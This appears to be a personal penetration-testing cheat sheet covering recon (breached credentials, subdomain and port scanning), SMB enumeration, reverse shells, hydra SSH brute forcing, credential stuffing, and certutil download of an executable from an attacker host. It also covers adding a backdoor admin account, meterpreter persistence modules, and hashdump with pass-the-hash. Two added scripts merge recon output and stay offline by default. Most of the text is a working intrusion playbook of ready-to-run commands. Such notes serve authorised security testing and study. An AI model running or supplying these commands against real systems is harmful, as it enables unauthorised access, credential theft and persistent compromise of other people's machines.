Email addresses
- https://hunter.io to find email addresses and email patterns.
- Gather breached credentials with breach-parse.
Subdomains
- assetfinder
- theharvester is a tool in Kali that can find emails, subdomains and IP addresses.
- sublist3r can enumerate website subdomains: apt install sublist3r
- https://crt.sh uses certificate transparency logs to enumerate subdomains (expect wildcard entries such as *.example.com in the results).
- amass, yet another subdomain lister.
- After finding subdomains, tomnomnom's httprobe can take the list on stdin and show which hosts actually answer on HTTP/HTTPS.
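The glue step the list above implies (merge the output of crt.sh, assetfinder and amass, normalize it, then hand it to httprobe) as an added example; this is not code from the original notes. It assumes each tool's output was saved to a file, and the hostnames in it are constructed sample data, not real results.

```shell
#!/bin/sh
# Added example: merge subdomain lists from several tools, normalize them,
# and feed the result to httprobe. The sample hostnames are constructed.

# merge_subdomains DOMAIN FILE...: lowercase everything, strip the "*." that
# crt.sh prefixes to wildcard certs, drop whitespace, keep only names that are
# DOMAIN or end in ".DOMAIN" (so example.com.evil.net is rejected), dedupe.
merge_subdomains() {
    domain="$1"; shift
    esc=$(printf '%s' "$domain" | sed 's/\./\\./g')   # escape dots for grep
    cat "$@" \
      | tr 'A-Z' 'a-z' \
      | sed 's/^\*\.//; s/[[:space:]]//g' \
      | grep -E "(^|\.)${esc}\$" \
      | sort -u
}

# Constructed stand-ins for crt.sh / assetfinder output.
tmp=$(mktemp -d)
printf '%s\n' '*.dev.example.com' 'WWW.example.com' 'mail.example.com' > "$tmp/crtsh.txt"
printf '%s\n' 'www.example.com' 'vpn.example.com' 'example.com.evil.net' > "$tmp/assetfinder.txt"

merge_subdomains example.com "$tmp/crtsh.txt" "$tmp/assetfinder.txt" > "$tmp/subs.txt"
cat "$tmp/subs.txt"
# dev.example.com
# mail.example.com
# vpn.example.com
# www.example.com

# Network step: probe for live web servers. Only runs when explicitly enabled
# (RUN_PROBE=1) and httprobe is installed, so the script stays offline by default.
if [ "${RUN_PROBE:-0}" = 1 ] && command -v httprobe >/dev/null 2>&1; then
    httprobe < "$tmp/subs.txt" > "$tmp/live.txt"
    cat "$tmp/live.txt"
fi
```

Run it with RUN_PROBE=1 once httprobe is on PATH; the merged list is the one you would also pass to gobuster or nikto later.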
Find what a website is built with:
- https://builtwith.com
- wappalyzer browser plugin
- whatweb, yet another website technology enumerator
Intercept web traffic using:
- Burp Suite
- FoxyProxy (browser extension to switch the browser's proxy to Burp)
Don't forget Google dorking or social media sites.
Machines and Ports
- Consider using masscan to enumerate all the ports; it's faster than nmap.
- Then run nmap -sV <target> against the ports masscan found for banner-grabbing / service version detection.
- netdiscover to find machines on the local network (ARP sweep).
- nmap -T4 -p- -A <host> to find all open TCP ports with version detection, OS detection and default scripts.
- nmap -sU -T4 <host> for UDP; this covers the default top 1000 UDP ports, a full -p- UDP scan is very slow.
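The masscan-then-nmap hand-off from the bullets above, as an added example rather than code from the original notes: it pulls the open ports for one host out of masscan's "Discovered open port" lines and builds the -p list for a targeted nmap -sV. It assumes masscan's stdout was saved to a file; the scan lines below are constructed sample output, not a real scan.

```shell
#!/bin/sh
# Added example: convert masscan stdout into an nmap -p port list.
# Sample masscan lines are constructed for the example.

# masscan_ports HOST FILE: print the sorted, comma-separated TCP ports masscan
# reported open on HOST. Fields: Discovered open port 445/tcp on 10.10.10.4
masscan_ports() {
    awk -v h="$1" '
        $1 == "Discovered" && $2 == "open" && $6 == h {
            split($4, p, "/")          # "445/tcp" -> p[1]=445, p[2]=tcp
            if (p[2] == "tcp") print p[1]
        }' "$2" \
      | sort -n -u \
      | paste -sd, -
}

tmp=$(mktemp -d)
cat > "$tmp/masscan.txt" <<'EOF'
Discovered open port 445/tcp on 10.10.10.4
Discovered open port 22/tcp on 10.10.10.4
Discovered open port 80/tcp on 10.10.10.5
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 22/tcp on 10.10.10.4
EOF

ports=$(masscan_ports 10.10.10.4 "$tmp/masscan.txt")
echo "$ports"   # 22,139,445

# Network step: version-scan only those ports. Disabled unless RUN_NMAP=1 and
# nmap is installed, so the script is safe to run offline.
if [ "${RUN_NMAP:-0}" = 1 ] && command -v nmap >/dev/null 2>&1; then
    nmap -sV -p "$ports" 10.10.10.4
fi
```

Scanning only the ports masscan reported keeps -sV fast; if masscan was run with -oL instead, the line format differs and the awk field numbers would need adjusting.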
Load the IP addresses in a browser and look for default or error pages; nikto scans web servers for these automatically.
- Default pages, error pages, or information about the underlying architecture can be filed as information disclosure.
Tools if smb is discovered after the nmap scan:
- msfconsole > search smb; try for example: use auxiliary/scanner/smb/smb_version
- smbclient: list the shares first, then try to connect to the individual share names in the server path:
  smbclient -L \\\\10.10.10.4\\ -N
  smbclient \\\\10.10.10.4\\ADMIN$ -U user
  The backslashes are doubled because the Linux shell consumes one level of escaping; the forward-slash form smbclient //10.10.10.4/ADMIN$ avoids that. Windows admin shares end in $ (ADMIN$, C$, IPC$); $ADMIN would be expanded as a shell variable.
Search for exploits on the services/ports and versions that were found.
Other scanning tools:
- masscan -p1-65535 --rate 1000 <ip addr>
  masscan is built to scan the whole internet, so always specify the target IPs/ranges so you're not hitting hosts outside scope.
- msf5 > search portscan, then use the scanning modules from metasploit
- https://www.tenable.com/downloads/nessus
Try to obtain shell
- Reverse shells: the target connects back to a listener on the attacker's machine; the most common approach.
- Bind shells: the target listens and the attacker connects in; useful if the attacker's LHOST is behind NAT or a firewall that would block the target's connection back.
Know the difference between staged and non-staged payloads. The attack pattern can be identical, but the staging of the payload makes one way work and the other fail (for example, a small staged stub that fails to pull the second stage over the network). If a metasploit exploit completes but no session comes back, search for other payloads: set payload linux/x86 then tab-autocomplete to enumerate the options. In metasploit naming, linux/x86/shell/reverse_tcp (slash before reverse_tcp) is staged and linux/x86/shell_reverse_tcp (underscore) is non-staged; try the single non-staged payload or the opposite.
Brute force tools:
- hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://<ip>:22 -t 4 -V
  attempts root login on the target IP with each password in the list; -t 4 keeps the thread count low so ssh doesn't drop connections, -V shows each attempt, and -L takes a user list instead of a single user.
- msf5 > use auxiliary/scanner/ssh/ssh_login
Password Spraying & Credential Stuffing
- just try to use the creds found in information gathering to log in to anything
- the pitchfork attack type in Burp Suite's Intruder tab pairs a username list with a password list position by position, which is what credential stuffing needs; cluster bomb tries every username against every password for spraying. Watch lockout thresholds when spraying.
Found a default web page and want to find viable paths?
- dirbuster
- gobuster
Payloads other than msf:
- msfvenom: for example, it can create a reverse-shell Tomcat WAR file to deploy through the manager application.
Download file to windows or linux:
- certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe
  on the Windows target, fetching from a web server on the attacking host
- python -m pyftpdlib 21
  on the attacking host to start an ftp server
- python -m SimpleHTTPServer 80
  from lhost (python2; on python3 use python3 -m http.server 80), then fetch from rhost
Escalate user:
- LinEnum
- linuxprivchecker
Find vulns on windows while logged in:
- rasta-mouse/Sherlock
- GDSSecurity/Windows-Exploit-Suggester (needs the output of systeminfo from the target)
Persistence scripts (meterpreter / metasploit):
- run persistence -h
- exploit/windows/local/persistence
- exploit/windows/local/registry_persistence
Scheduled Tasks
- run scheduleme
- run schtaskabuse
Add a User
- net user hacker password123 /add
  then add it to the local Administrators group with net localgroup, otherwise it is just a standard user
meterpreter > getuid
- NT AUTHORITY\SYSTEM is the highest-privileged account on Windows
meterpreter > sysinfo
- Get information on the system and check that it matches the earlier scans
meterpreter > help
- lists all the commands available while connected to a system with a meterpreter shell
meterpreter > hashdump
- try to crack the dumped hashes, or "pass the hash" (NTLM hashes can be used directly against SMB without cracking)
Not escalated, but got a meterpreter shell:
meterpreter > background
msf5 > search suggester
- use the suggester (post/multi/recon/local_exploit_suggester) against the backgrounded session to find possible local privilege escalation exploits